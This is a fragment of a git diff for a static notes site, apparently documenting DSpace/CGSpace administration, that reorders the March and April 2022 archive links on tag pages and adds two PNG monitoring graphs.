index b4c30fc25..564dad75a 100644
--- a/docs/tags/notes/index.html
+++ b/docs/tags/notes/index.html
@@ -17,7 +17,7 @@
-
+
@@ -385,9 +385,9 @@ DELETE 1
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/tags/notes/page/2/index.html b/docs/tags/notes/page/2/index.html
index d2d44a3aa..7a76873b8 100644
--- a/docs/tags/notes/page/2/index.html
+++ b/docs/tags/notes/page/2/index.html
@@ -17,7 +17,7 @@
-
+
@@ -371,9 +371,9 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/tags/notes/page/3/index.html b/docs/tags/notes/page/3/index.html
index 92051bb1a..387e3acbf 100644
--- a/docs/tags/notes/page/3/index.html
+++ b/docs/tags/notes/page/3/index.html
@@ -17,7 +17,7 @@
-
+
@@ -180,9 +180,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/static/2022/04/cgspace-load.png b/static/2022/04/cgspace-load.png
new file mode 100644
index 000000000..02851e3d6
Binary files /dev/null and b/static/2022/04/cgspace-load.png differ
diff --git a/static/2022/04/jmx_dspace_sessions-day2.png b/static/2022/04/jmx_dspace_sessions-day2.png
new file mode 100644
index 000000000..8f77487a1
Binary files /dev/null and b/static/2022/04/jmx_dspace_sessions-day2.png differ